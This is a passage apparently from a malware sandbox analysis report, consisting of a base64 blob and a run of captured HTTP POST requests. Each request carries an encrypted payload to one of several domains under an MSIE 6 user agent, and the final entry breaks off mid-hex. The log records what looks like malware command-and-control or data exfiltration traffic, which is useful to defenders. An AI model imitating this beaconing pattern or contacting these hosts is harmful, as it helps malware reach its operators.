aObvOFPPGJVvTBYpGoxn8PzYWm45iAFtNwJVapW2xPQwfe1nv+TKuNvQ4fiCaTYuYBEFMEJroBHChEUpFTmmz33tY8nxevrQvIIy4EDkle0OsSdrOxXjjT1yCdKHN+ZwTSdSsQtLDGHd9gp1Jb1eLXEWrPf57P0wEtGe75BXR/1CXYA++mEWJcVVbhvgaTk4h44p7Ja2cYY1mcwfWDJkP5pAbvtIeLUgsRDCxdbZgKmGiNWQar0+OcGJCq39uoPFKzSfh6w4LlwRlEHhegeLgpVSNUESfShOOnBpg0ljAO7s5TJXamCifoIMIVbx5BZKJArDC06CIdIwxkCJ0YRxdFHUBgPCrHprF7kp+OBq9NGN9JuTdoctPu/5f29z8yRatG0qniGlkXKElWqLzqkQAh+yZngLAos8kGo8VETfhkb7+sitfOYlZYfHSEUhAenxx0nldt1pch+qq/Sf+M/Iy8/kiJxGsLBIcOYK8isGlfT1R4lZbFoFx6H0A1BUgOcwX8hoH8KzPIUkbBrpz+DwSIpRJYORKG8OoU2YLEY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.crcsi.orgCache-Control: no-cacheData Raw: 70 32 38 53 33 76 48 62 46 5a 56 34 5a 31 6f 6d 45 43 53 32 2f 6b 72 31 67 46 45 76 44 4e 62 6f 74 66 6d 36 51 37 6a 41 64 7a 65 67 64 45 7a 45 6c 72 77 50 46 58 55 4d 54 6a 58 4c 35 78 63 6e 47 4a 72 6b 63 48 66 6a 6b 46 42 63 6b 2b 38 56 6e 59 72 46 34 31 72 73 6a 6f 6f 63 57 59 66 55 72 42 6d 47 2f 46 4c 38 44 65 47 4b 76 6a 78 65 59 46 6b 66 66 65 36 35 30 45 77 71 7a 4a 6c 4c 30 64 4f 4a 55 77 34 7a 35 70 6f 64 39 7a 79 4f 2b 54 2f 38 6c 33 50 4f 55 45 38 4c 61 75 71 49 36 4a 6c 6b 48 76 79 78 31 37 50 4b 45 71 58 5a 53 51 65 75 55 75 31 4d 39 6d 4d 78 79 4c 47 4a 77 46 59 6e 55 4b 59 49 6d 72 79 6a 67 65 53 7a 75 38 69 6c 56 34 51 33 4d 78 4d 2b 43 6d 64 37 4b 41 74 55 52 61 49 6f 47 53 55 4e 45 47 4c 32 79 55 35 34 68 47 71 77 64 4c 56 4e 6d 62 63 30 37 52 6d 67 45 64 54 4c 77 75 48 74 37 74 4c 66 2b 66 59 6c 66 72 72 4e 62 54 63 6b 71 71 5a 52 4c 2b 4e 56 68 6b 7a 72 78 4f 6f 56 68 4f 33 76 50 71 5a 31 4a 52 67 4d 68 5a 6b 61 32 4d 78 6e 36 34 4d 47 45 6e 6a 6f 30 2f 52 51 50 57 45 5a 72 66 2b 69 33 4f 6a 34 32 2b 41 36 53 66 32 2f 59 43 59 54 75 54 6c 49 59 6b 6b 56 42 6e 54 4d 65 31 62 44 57 57 58 2b 63 39 72 62 65 6f 63 6f 6c 37 35 62 43 76 54 76 38 77 6f 36 49 2b 70 43 53 44 38 2f 59 6e 6e 6a 30 33 30 33 53 64 5a 70 36 45 6c 65 77 49 73 41 4e 2f 53 79 77 33 41 6d 6b 74 36 32 39 58 5a 41 4d 31 37 59 6f 68 4c 52 30 43 63 46 44 64 2f 77 6d 6d 47 34 38 76 36 5a 38 64 77 54 31 74 78 64 56 75 37 43 57 77 4b 39 44 54 38 6f 4c 74 41 6a 51 37 4a 59 66 6d 45 48 33 31 48 55 68 58 67 4c 6c 74 77 78 58 49 6a 75 61 4b 38 66 4c 73 6f 39 7a 30 72 69 63 43 71 6c 4e 52 46 51 57 59 5a 49 66 63 65 75 6f 56 72 57 66 65 72 71 51 67 3d 3d Data Ascii: p28S3vHbFZV4Z1omECS2/kr1gFEvDNbotfm6Q7jAdzegdEzElrwPFXUMTjXL5xcnGJrkcHfjkFBck+8VnYrF41rsjoocWYfUrBmG/FL8DeGKvjxeYFkffe650EwqzJlL0dOJUw4z5pod9zyO+T/8l3POUE8LauqI6JlkHvyx17PKEqXZSQeuUu1M9mMxyLGJwFYnUKYImryjgeSzu8ilV4Q3MxM+Cmd7KAtURaIoGSUNEGL2yU54hGqwdLVNmbc07RmgEdTLwuHt7tLf+fYlfrrNbTckqqZRL+NVhkzrxOoVhO3vPqZ1JRgMhZka2Mxn64MGEnjo0/RQPWEZrf+i3Oj42+A6Sf2/YCYTuTlIYkkVBnTMe1bDWWX+c9rbeocol75bCvTv8wo6I+pCSD8/Ynnj0303SdZp6ElewIsAN/Syw3Amkt629XZAM17YohLR0CcFDd/wmmG48v6Z8dwT1txdVu7CWwK9DT8oLtAjQ7JYfmEH31HUhXgLltwxXIjuaK8fLso9z0ricCqlNRFQWYZIfceuoVrWferqQg==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.domon.comCache-Control: no-cacheData Raw: 61 78 2b 55 38 2f 76 65 48 70 58 41 6a 47 75 6a 6b 6b 68 62 34 75 53 53 75 79 51 42 35 51 33 38 58 37 68 4e 4e 47 41 67 71 50 6b 67 2f 78 6d 36 6c 61 75 4d 6a 59 58 35 6c 54 50 57 4c 6a 72 52 4a 78 58 63 59 78 31 6f 43 73 76 6b 6f 6d 76 49 64 7a 33 71 4c 59 74 6b 69 6d 43 36 55 55 34 39 6d 71 77 6c 48 35 44 76 57 36 53 37 2f 4d 2b 4e 6e 6e 66 36 66 74 49 36 61 72 30 47 63 4e 72 48 39 36 42 6b 56 30 59 72 77 53 33 65 47 68 75 46 72 78 39 30 4a 57 66 75 78 58 34 70 35 41 57 44 69 6b 6c 33 62 30 46 6f 7a 38 7a 78 73 38 38 77 4a 58 39 30 61 67 42 6c 6c 38 51 4e 69 6e 76 56 52 34 49 55 32 67 75 66 72 61 4b 75 6e 4d 67 4b 72 59 45 49 2f 59 31 32 5a 69 56 67 4c 30 6f 76 37 61 36 6a 32 76 66 56 4b 53 52 39 2f 73 30 58 6d 38 57 78 76 45 4f 65 61 4d 6f 66 71 50 2b 6b 67 56 4f 62 73 67 42 6b 58 39 50 77 63 37 49 61 6a 2f 49 4d 58 50 63 48 65 39 4c 42 46 50 39 42 36 52 51 4c 5a 4b 41 48 48 78 34 72 4f 49 46 64 49 34 48 73 43 67 61 56 32 77 66 50 33 4d 6b 65 39 64 6c 55 70 4f 63 42 43 4f 79 4b 2f 76 36 70 68 54 69 58 45 32 50 77 46 6a 4a 47 4c 41 75 61 66 49 53 43 61 6a 31 75 42 79 6a 45 61 49 72 37 65 4b 44 76 4f 5a 49 67 69 77 4b 54 68 43 70 67 35 71 2f 4d 6a 51 31 55 6d 47 58 75 6b 42 77 68 75 6b 2b 4a 52 4d 43 4d 4a 53 6e 2b 6c 4a 33 51 2b 76 77 43 5a 62 53 5a 74 6b 77 59 69 45 59 59 38 71 57 4b 57 4e 6f 70 5a 30 32 68 51 66 6c 57 53 4b 5a 31 6a 5a 67 65 48 55 72 33 33 37 34 33 36 5a 66 4f 45 65 73 49 32 4c 74 51 6b 75 2b 6e 38 4e 35 30 64 34 4d 58 36 48 6e 37 34 65 75 6f 38 4b 6a 58 52 65 31 64 35 69 6f 45 61 38 67 51 54 38 33 6f 4a 66 36 77 74 49 34 6d 7a 59 6c 4a 67 49 68 78 2f 42 78 59 72 4f 78 62 4a 4a 69 53 41 75 69 55 70 42 57 55 4d 4e 51 7a 34 52 4f 41 45 2f 41 69 35 6a 6a 71 6b 2b 66 39 53 59 56 55 6f 53 53 62 6d 6b 69 5a 2f 34 41 62 4d 41 3d 3d Data Ascii: ax+U8/veHpXAjGujkkhb4uSSuyQB5Q38X7hNNGAgqPkg/xm6lauMjYX5lTPWLjrRJxXcYx1oCsvkomvIdz3qLYtkimC6UU49mqwlH5DvW6S7/M+Nnnf6ftI6ar0GcNrH96BkV0YrwS3eGhuFrx90JWfuxX4p5AWDikl3b0Foz8zxs88wJX90agBll8QNinvVR4IU2gufraKunMgKrYEI/Y12ZiVgL0ov7a6j2vfVKSR9/s0Xm8WxvEOeaMofqP+kgVObsgBkX9Pwc7Iaj/IMXPcHe9LBFP9B6RQLZKAHHx4rOIFdI4HsCgaV2wfP3Mke9dlUpOcBCOyK/v6phTiXE2PwFjJGLAuafISCaj1uByjEaIr7eKDvOZIgiwKThCpg5q/MjQ1UmGXukBwhuk+JRMCMJSn+lJ3Q+vwCZbSZtkwYiEYY8qWKWNopZ02hQflWSKZ1jZgeHUr337436ZfOEesI2LtQku+n8N50d4MX6Hn74euo8KjXRe1d5ioEa8gQT83oJf6wtI4mzYlJgIhx/BxYrOxbJJiSAuiUpBWUMNQz4ROAE/Ai5jjqk+f9SYVUoSSbmkiZ/4AbMA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mobilnic.netCache-Control: no-cacheData Raw: 4a 52 62 57 33 4b 76 52 46 5a 57 4e 33 6e 58 65 67 72 76 48 2b 52 51 46 65 63 52 78 78 58 4d 67 44 38 5a 5a 36 59 79 43 6b 43 68 4d 38 64 6a 47 66 73 54 31 5a 79 49 6b 72 43 47 78 7a 48 38 58 48 51 47 53 56 66 52 39 79 6e 43 33 69 59 30 2f 68 30 50 4a 63 59 63 64 54 54 48 78 4c 76 43 70 6e 52 54 66 37 68 7a 67 36 54 2f 48 53 39 6c 2f 53 43 74 79 4f 51 55 2b 6f 79 74 65 6b 48 38 2b 44 64 56 77 6e 70 30 2b 2b 68 44 78 43 48 2f 7a 61 52 75 70 34 72 36 4a 74 34 33 34 4e 38 45 74 76 39 73 42 34 78 2f 6b 7a 4c 2f 35 5a 6c 46 43 58 4e 50 45 4b 79 72 6b 71 71 4c 44 34 6a 6c 6a 51 64 46 36 7a 71 73 4f 30 43 65 75 52 6e 43 34 52 58 68 38 30 52 58 50 4a 75 77 4f 77 79 2b 38 56 61 53 63 5a 6c 70 4c 75 38 31 68 38 42 36 72 6f 61 76 37 6d 74 77 61 6c 64 70 2f 2b 39 4e 42 68 68 35 38 49 55 4f 6e 50 49 4f 51 56 6a 6a 69 56 56 58 54 41 76 47 31 51 42 4a 70 42 4e 78 48 64 34 6a 30 6a 64 39 67 52 37 31 77 4c 32 48 70 4b 55 35 54 79 69 71 75 55 4b 31 2b 39 6a 64 33 4d 6c 49 4c 51 79 4c 4c 71 47 4f 67 34 34 53 77 31 50 6f 46 50 45 44 5a 6e 71 68 6f 42 41 59 65 66 6d 61 46 57 5a 43 78 6d 4b 34 59 5a 49 6a 74 38 6b 4d 77 70 70 4f 71 58 63 4f 6e 4b 69 49 37 38 2b 38 77 56 4c 78 39 63 50 51 6d 6a 69 69 57 37 37 77 6c 53 71 7a 75 36 56 43 41 50 6d 44 79 6e 64 38 68 2f 6c 6a 43 6c 70 2b 32 43 65 61 37 6c 46 77 42 6a 78 52 78 41 4f 68 5a 73 7a 32 6e 4b 43 75 77 46 31 52 72 32 46 68 73 71 38 71 55 30 32 50 76 70 68 4a 2b 77 4b 4d 36 5a 78 54 2b 36 53 50 65 71 76 78 37 66 43 6d 35 70 4f 31 47 6e 56 5a 78 70 62 39 52 39 65 43 79 6a 6a 2f 45 77 64 63 6d 4a 38 61 4f 56 58 68 35 6d 48 71 61 63 2f 45 59 2b 53 6c 61 36 34 39 33 71 43 7a 6e 38 64 42 35 43 67 41 41 76 54 59 3d Data Ascii: JRbW3KvRFZWN3nXegrvH+RQFecRxxXMgD8ZZ6YyCkChM8djGfsT1ZyIkrCGxzH8XHQGSVfR9ynC3iY0/h0PJcYcdTTHxLvCpnRTf7hzg6T/HS9l/SCtyOQU+oytekH8+DdVwnp0++hDxCH/zaRup4r6Jt434N8Etv9sB4x/kzL/5ZlFCXNPEKyrkqqLD4jljQdF6zqsO0CeuRnC4RXh80RXPJuwOwy+8VaScZlpLu81h8B6roav7mtwaldp/+9NBhh58IUOnPIOQVjjiVVXTAvG1QBJpBNxHd4j0jd9gR71wL2HpKU5TyiquUK1+9jd3MlILQyLLqGOg44Sw1PoFPEDZnqhoBAYefmaFWZCxmK4YZIjt8kMwppOqXcOnKiI78+8wVLx9cPQmjiiW77wlSqzu6VCAPmDynd8h/ljClp+2Cea7lFwBjxRxAOhZsz2nKCuwF1Rr2Fhsq8qU02PvphJ+wKM6ZxT+6SPeqvx7fCm5pO1GnVZxpb9R9eCyjj/EwdcmJ8aOVXh5mHqac/EY+Sla6493qCzn8dB5CgAAvTY=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.vitaindu.comCache-Control: no-cacheData Raw: 41 35 55 61 33 34 54 6b 46 5a 58 52 4b 72 43 4d 6e 79 5a 38 32 46 64 32 77 32 6d 38 64 78 7a 59 2b 48 6e 32 67 2b 78 30 30 42 31 73 76 70 4a 75 33 73 6e 4a 65 41 41 7a 57 54 45 47 31 78 36 56 6e 6d 63 51 32 42 6b 78 64 62 50 49 6f 35 52 7a 61 43 46 47 6f 4e 51 4d 54 6c 36 68 72 78 54 5a 37 46 6e 6f 77 6c 39 42 65 6a 36 52 45 2f 6f 6a 2f 48 4a 4c 6e 53 43 43 49 43 62 6b 4a 4c 42 4b 58 62 38 38 35 36 41 41 32 45 59 75 62 67 71 6d 42 2f 4c 50 67 74 6d 42 51 47 67 57 78 61 4c 70 2b 6d 47 76 4c 62 41 61 64 67 76 53 4e 36 44 75 36 6d 51 79 73 38 62 64 68 33 4b 6d 51 6d 42 64 67 4b 61 4d 49 79 46 6c 62 7a 6d 53 63 31 63 6c 56 39 64 4d 76 42 6b 6d 33 66 65 76 59 74 6e 70 47 58 49 55 4f 4c 4e 51 6c 33 33 37 73 43 37 33 38 73 6e 2b 77 6a 59 36 2f 42 33 71 5a 45 75 35 6d 74 52 53 2f 69 63 37 45 50 55 47 34 6b 77 2b 42 4f 54 34 37 2b 69 67 6e 65 4b 67 68 58 63 4f 38 66 6b 48 6b 6b 64 79 79 4e 5a 2f 34 4a 5a 77 4f 41 42 74 4b 48 35 70 36 74 68 54 65 44 75 4c 34 36 31 4f 4e 64 6a 5a 71 71 52 75 4f 5a 61 53 30 4e 66 51 64 33 44 33 2f 31 33 61 52 57 31 4d 51 6e 54 64 53 39 56 71 55 32 4f 58 65 30 52 2f 79 2b 58 76 62 5a 35 6b 76 61 78 54 47 75 2b 4f 4b 62 67 6c 6e 58 6a 4a 68 2f 75 75 41 30 57 31 30 74 61 6e 4c 63 32 4d 62 50 74 64 53 62 74 4e 71 6c 77 32 4c 51 63 6d 55 52 44 64 65 46 57 33 70 45 4c 6c 2f 31 76 6f 32 4c 39 63 67 64 64 45 36 4f 52 55 68 35 42 48 61 45 6e 33 37 6c 30 6c 74 43 73 56 7a 51 69 77 72 56 79 79 7a 34 59 6d 54 54 57 50 36 56 47 75 4a 58 75 4f 4b 4d 52 48 69 64 79 35 4d 6b 59 2b 39 72 65 53 77 4c 72 69 51 33 43 38 51 52 55 6c 76 48 57 35 50 34 30 47 6f 6a 54 75 66 75 6b 35 71 4f 77 4f 62 71 5a 41 5a 54 70 54 31 42 2f 63 36 4b 37 7a 6c 36 61 44 54 78 5a 75 2f 32 4e 4d 69 6d 57 32 34 4b 4a 38 51 70 78 72 4c 35 56 66 54 33 33 70 4d 78 68 72 6f 48 43 62 34 6f 62 78 Data Ascii: A5Ua34TkFZXRKrCMnyZ82Fd2w2m8dxzY+Hn2g+x00B1svpJu3snJeAAzWTEG1x6VnmcQ2BkxdbPIo5RzaCFGoNQMTl6hrxTZ7Fnowl9Bej6RE/oj/HJLnSCCICbkJLBKXb8856AA2EYubgqmB/LPgtmBQGgWxaLp+mGvLbAadgvSN6Du6mQys8bdh3KmQmBdgKaMIyFlbzmSc1clV9dMvBkm3fevYtnpGXIUOLNQl337sC738sn+wjY6/B3qZEu5mtRS/ic7EPUG4kw+BOT47+igneKghXcO8fkHkkdyyNZ/4JZwOABtKH5p6thTeDuL461ONdjZqqRuOZaS0NfQd3D3/13aRW1MQnTdS9VqU2OXe0R/y+XvbZ5kvaxTGu+OKbglnXjJh/uuA0W10tanLc2MbPtdSbtNqlw2LQcmURDdeFW3pELl/1vo2L9cgddE6ORUh5BHaEn37l0ltCsVzQiwrVyyz4YmTTWP6VGuJXuOKMRHidy5MkY+9reSwLriQ3C8QRUlvHW5P40GojTufuk5qOwObqZAZTpT1B/c6K7zl6aDTxZu/2NMimW24KJ8QpxrL5VfT33pMxhroHCb4obx
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 31 55 64 54 5a 37 42 42 4d 35 55 7a 31 6c 75 7a 77 32 6c 6c 70 6d 50 45 51 57 42 59 65 6d 4f 30 35 50 4e 33 71 54 71 68 47 69 62 49 38 55 56 37 4d 44 72 64 67 41 38 34 2b 78 4a 50 78 2b 62 74 79 4e 46 49 62 39 6c 6d 52 31 6f 2f 7a 75 69 61 63 5a 43 6a 6c 64 7a 48 53 6f 6e 70 62 54 6f 48 6f 6c 4b 31 48 59 64 75 53 5a 35 4a 68 41 48 54 6d 35 50 31 6a 77 77 65 63 75 7a 53 64 6f 6b 71 54 46 36 44 32 61 41 73 44 41 76 37 39 35 56 62 64 63 45 4e 46 42 36 78 36 31 50 2b 48 34 30 54 4d 36 6e 4b 30 4b 4f 2f 4f 53 5a 42 31 6f 55 65 31 4b 69 43 51 46 6e 4c 6a 41 4d 70 77 35 4b 57 34 56 67 50 6d 34 6b 32 57 41 47 78 48 54 52 66 39 71 6b 78 49 50 65 79 54 53 68 55 7a 33 53 77 31 4c 2f 46 2b 63 75 2b 47 78 6a 38 54 42 76 46 35 6c 5a 6c 6a 33 4e 51 6e 31 4b 61 36 65 46 35 78 46 30 5a 52 74 58 78 4b 42 35 6d 45 68 62 52 31 50 47 4a 66 4b 77 57 33 4f 57 71 42 48 52 6f 48 32 48 38 61 49 30 73 76 48 46 65 6b 59 39 55 75 6d 41 52 6c 32 45 4d 74 39 69 38 66 62 6a 71 35 63 62 63 69 78 43 74 41 51 6a 6d 62 4c 7a 59 32 47 75 44 35 4a 37 5a 4f 6c 76 4d 4e 62 44 4c 62 71 71 61 30 2f 4e 75 7a 43 56 62 69 6d 4d 70 50 2f 6f 42 53 6d 71 5a 58 2b 65 6c 61 49 6b 64 56 69 79 30 49 6a 59 58 6a 72 68 6a 6c 31 2b 50 31 46 47 4f 4b 4e 53 68 65 49 33 4b 37 6d 37 49 6b 51 4c 63 6f 62 67 35 61 72 33 6c 45 45 38 67 71 47 6f 51 32 75 33 57 49 74 76 62 32 68 36 58 77 50 34 58 4f 56 51 4f 72 57 65 76 39 34 66 37 42 43 61 57 47 4a 78 6f 58 37 63 52 79 46 38 7a 62 4f 58 45 2f 78 65 57 54 33 61 6e 69 4f 68 46 39 52 42 65 54 45 47 30 6f 5a 42 48 61 51 32 30 64 51 33 55 57 31 34 5a 6c 79 45 74 4c 62 59 42 7a 56 6e 61 75 39 6a 2b 53 71 34 30 63 65 75 72 65 46 65 7a 67 4e 77 6d 43 4b 6d 76 4d 55 77 37 44 6e 77 38 76 57 57 6a 55 72 55 62 75 4a 56 66 31 78 77 41 77 5a 6e 75 63 44 62 6f 6e 67 3d 3d Data Ascii: 1UdTZ7BBM5Uz1luzw2llpmPEQWBYemO05PN3qTqhGibI8UV7MDrdgA84+xJPx+btyNFIb9lmR1o/zuiacZCjldzHSonpbToHolK1HYduSZ5JhAHTm5P1jwwecuzSdokqTF6D2aAsDAv795VbdcENFB6x61P+H40TM6nK0KO/OSZB1oUe1KiCQFnLjAMpw5KW4VgPm4k2WAGxHTRf9qkxIPeyTShUz3Sw1L/F+cu+Gxj8TBvF5lZlj3NQn1Ka6eF5xF0ZRtXxKB5mEhbR1PGJfKwW3OWqBHRoH2H8aI0svHFekY9UumARl2EMt9i8fbjq5cbcixCtAQjmbLzY2GuD5J7ZOlvMNbDLbqqa0/NuzCVbimMpP/oBSmqZX+elaIkdViy0IjYXjrhjl1+P1FGOKNSheI3K7m7IkQLcobg5ar3lEE8gqGoQ2u3WItvb2h6XwP4XOVQOrWev94f7BCaWGJxoX7cRyF8zbOXE/xeWT3aniOhF9RBeTEG0oZBHaQ20dQ3UW14ZlyEtLbYBzVnau9j+Sq40ceureFezgNwmCKmvMUw7Dnw8vWWjUrUbuJVf1xwAwZnucDbong==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 544User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 43 34 69 33 61 5a 46 56 4d 35 57 65 36 75 5a 7a 4d 42 46 4c 6e 2b 72 44 71 2f 64 50 42 6c 34 76 56 51 58 4c 43 61 65 61 36 73 4b 58 33 69 64 61 6f 41 57 62 52 54 6c 70 41 39 44 77 34 56 73 4e 68 77 75 6b 67 59 38 4a 33 4b 35 36 36 2f 62 4b 43 34 4b 42 6f 51 45 57 59 69 50 62 6c 70 74 46 50 2b 78 50 54 35 4f 59 6f 5a 55 38 48 50 56 44 50 6b 71 69 71 56 68 64 79 55 53 52 77 53 5a 4e 33 4c 45 37 57 45 47 69 58 45 64 55 39 51 70 52 30 36 6a 4b 38 58 4a 43 33 4b 2b 54 44 56 56 70 75 7a 76 34 78 2b 48 58 76 4c 71 48 36 4c 6c 70 77 58 32 4e 77 76 42 43 46 2b 2b 63 73 55 68 38 34 53 6d 6c 64 35 50 45 2b 35 46 66 37 4a 79 4b 74 57 33 70 71 5a 53 49 7a 78 55 44 72 7a 4d 72 57 4b 68 50 73 6f 42 49 58 32 36 2b 53 36 6c 58 35 38 61 4e 4d 61 6f 4f 6a 33 73 50 78 59 75 35 77 4e 6e 6c 48 67 67 57 75 46 31 6c 33 37 74 4e 38 30 63 45 78 38 78 4f 4e 71 33 41 2f 66 75 6a 71 46 66 79 41 32 42 55 70 41 35 71 51 2b 54 79 45 61 7a 44 4c 32 6a 4a 72 6a 44 38 67 6f 30 51 44 4b 53 70 4a 76 73 42 2f 2b 67 4f 50 6f 59 6b 75 65 69 6b 6c 65 62 69 58 4b 36 55 30 38 43 31 6e 47 55 4d 55 54 65 73 2f 50 78 48 70 6f 73 6c 66 4b 44 44 39 4f 4a 78 77 73 4c 5a 63 36 49 69 31 36 65 76 73 31 48 54 6d 46 4d 6b 2b 5a 70 53 51 4e 6e 55 6f 35 64 59 51 73 67 75 4d 33 38 35 74 45 36 66 34 74 62 38 43 6e 6b 57 64 4c 6b 73 2f 75 53 70 56 63 77 4c 4e 6a 78 62 65 54 48 67 77 7a 51 36 47 56 76 79 38 31 43 65 4c 71 58 67 2f 43 5a 2b 2b 54 2f 36 70 5a 54 74 6c 38 38 6c 42 4c 34 39 70 64 6d 6b 67 4f 50 77 7a 2f 51 4a 74 4b 30 37 78 53 55 69 70 37 71 55 37 4c 39 4f 58 63 64 4e 6d 6c 58 43 39 75 42 49 74 71 56 4c 58 4d 73 35 65 30 32 59 79 70 43 56 2f 64 4f 7a Data Ascii: C4i3aZFVM5We6uZzMBFLn+rDq/dPBl4vVQXLCaea6sKX3idaoAWbRTlpA9Dw4VsNhwukgY8J3K566/bKC4KBoQEWYiPblptFP+xPT5OYoZU8HPVDPkqiqVhdyUSRwSZN3LE7WEGiXEdU9QpR06jK8XJC3K+TDVVpuzv4x+HXvLqH6LlpwX2NwvBCF++csUh84Smld5PE+5Ff7JyKtW3pqZSIzxUDrzMrWKhPsoBIX26+S6lX58aNMaoOj3sPxYu5wNnlHggWuF1l37tN80cEx8xONq3A/fujqFfyA2BUpA5qQ+TyEazDL2jJrjD8go0QDKSpJvsB/+gOPoYkueiklebiXK6U08C1nGUMUTes/PxHposlfKDD9OJxwsLZc6Ii16evs1HTmFMk+ZpSQNnUo5dYQsguM385tE6f4tb8CnkWdLks/uSpVcwLNjxbeTHgwzQ6GVvy81CeLqXg/CZ++T/6pZTtl88lBL49pdmkgOPwz/QJtK07xSUip7qU7L9OXcdNmlXC9uBItqVLXMs5e02YypCV/dOz
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 596User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fink.comCache-Control: no-cacheData Raw: 51 67 67 4e 6e 56 67 41 4e 5a 56 6c 4a 62 76 6f 57 77 66 62 39 6b 73 42 72 63 34 67 38 73 48 38 44 45 6e 6c 51 75 57 7a 50 66 34 34 59 75 34 4a 76 54 42 44 66 66 4c 2f 30 71 31 79 4c 34 56 76 4e 76 4f 31 50 45 34 4c 47 53 72 58 71 35 54 32 63 55 65 73 45 59 66 63 2b 2b 70 37 52 5a 4c 56 4d 54 63 6f 49 4b 51 4e 74 33 4e 65 6c 51 71 6c 44 61 78 34 55 33 52 58 71 6b 4e 37 6a 4d 41 51 32 72 64 39 74 74 30 70 6b 33 55 7a 6b 57 2b 63 4c 64 39 41 30 74 46 37 64 71 6a 63 68 31 36 53 52 76 4a 77 31 57 31 4a 37 41 78 57 76 38 54 38 4f 50 52 7a 51 65 77 73 49 39 78 57 57 33 37 32 66 6a 32 50 54 4c 57 54 7a 54 45 2b 4a 6b 69 34 59 63 52 4e 74 2f 38 48 4c 4a 39 53 6a 57 59 32 36 77 59 72 38 49 72 75 78 77 44 68 37 68 6e 4e 32 41 5a 30 69 4f 42 58 38 69 65 43 6a 35 32 6f 45 71 6a 52 4b 45 2b 38 59 6f 68 64 2b 6b 52 75 72 30 34 4c 53 59 63 59 64 77 6e 78 35 72 74 51 55 49 54 30 76 62 45 74 39 4e 37 6f 4d 55 53 57 41 32 30 7a 43 6f 32 63 70 31 35 64 52 4e 4e 4a 75 52 32 56 67 53 53 50 54 78 64 72 50 4a 6a 6f 4b 32 51 5a 55 6d 78 6c 70 4c 42 6b 65 4a 77 63 4b 69 32 68 4c 76 59 51 66 76 66 50 34 53 6c 72 61 44 52 44 6b 36 53 46 64 70 74 71 33 4c 6e 55 72 2b 59 69 6c 35 4e 41 70 6d 49 69 4e 56 76 34 6e 2b 70 4c 32 72 58 75 53 76 61 57 70 71 38 44 70 72 33 54 32 6b 73 69 32 2b 46 75 36 74 38 31 47 36 75 55 66 6a 35 6a 6d 72 4c 54 77 30 4b 61 77 2b 4c 73 47 34 67 52 4b 59 53 75 5a 61 4c 66 42 6a 56 6b 5a 63 4b 75 36 53 73 54 61 6e 71 50 37 47 61 38 48 44 2f 6e 4e 70 42 4f 59 64 6e 56 50 67 32 58 66 42 54 4b 6c 2b 4c 78 41 47 35 79 64 6a 77 65 39 58 56 56 44 61 2b 69 38 64 43 50 42 34 6c 6f 53 72 4e 33 75 4d 31 4d 6d 59 2b 76 4a 30 72 49 2b 4d 2b 56 5a 2f 47 44 69 38 45 7a 70 74 6c 41 57 52 39 6e 59 63 67 4e 6e 79 2f 39 57 36 56 6f 47 69 71 41 2b 35 65 50 45 74 4f 68 46 52 34 3d Data Ascii: QggNnVgANZVlJbvoWwfb9ksBrc4g8sH8DEnlQuWzPf44Yu4JvTBDffL/0q1yL4VvNvO1PE4LGSrXq5T2cUesEYfc++p7RZLVMTcoIKQNt3NelQqlDax4U3RXqkN7jMAQ2rd9tt0pk3UzkW+cLd9A0tF7dqjch16SRvJw1W1J7AxWv8T8OPRzQewsI9xWW372fj2PTLWTzTE+Jki4YcRNt/8HLJ9SjWY26wYr8IruxwDh7hnN2AZ0iOBX8ieCj52oEqjRKE+8Yohd+kRur04LSYcYdwnx5rtQUIT0vbEt9N7oMUSWA20zCo2cp15dRNNJuR2VgSSPTxdrPJjoK2QZUmxlpLBkeJwcKi2hLvYQfvfP4SlraDRDk6SFdptq3LnUr+Yil5NApmIiNVv4n+pL2rXuSvaWpq8Dpr3T2ksi2+Fu6t81G6uUfj5jmrLTw0Kaw+LsG4gRKYSuZaLfBjVkZcKu6SsTanqP7Ga8HD/nNpBOYdnVPg2XfBTKl+LxAG5ydjwe9XVVDa+i8dCPB4loSrN3uM1MmY+vJ0rI+M+VZ/GDi8EzptlAWR9nYcgNny/9W6VoGiqA+5ePEtOhFR4=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 49 56 64 43 61 68 4e 61 4d 35 58 43 6d 74 65 55 32 68 6a 4a 45 62 78 78 76 61 50 35 53 61 42 57 39 39 68 52 77 55 34 6e 53 67 2b 50 69 62 33 78 51 63 58 49 31 70 68 55 49 4e 57 43 31 59 42 71 4d 31 43 59 4a 31 63 7a 6b 70 4f 5a 72 62 6c 66 37 2b 2f 58 61 49 45 46 78 37 5a 65 6e 6d 68 34 52 4e 73 47 33 56 76 6e 32 56 68 6f 4c 48 72 5a 46 64 34 5a 33 6f 53 49 33 64 73 46 68 4d 2f 54 4e 52 67 6e 78 4e 59 31 41 52 6a 76 4f 47 39 4e 65 70 4a 43 41 54 31 61 38 2f 73 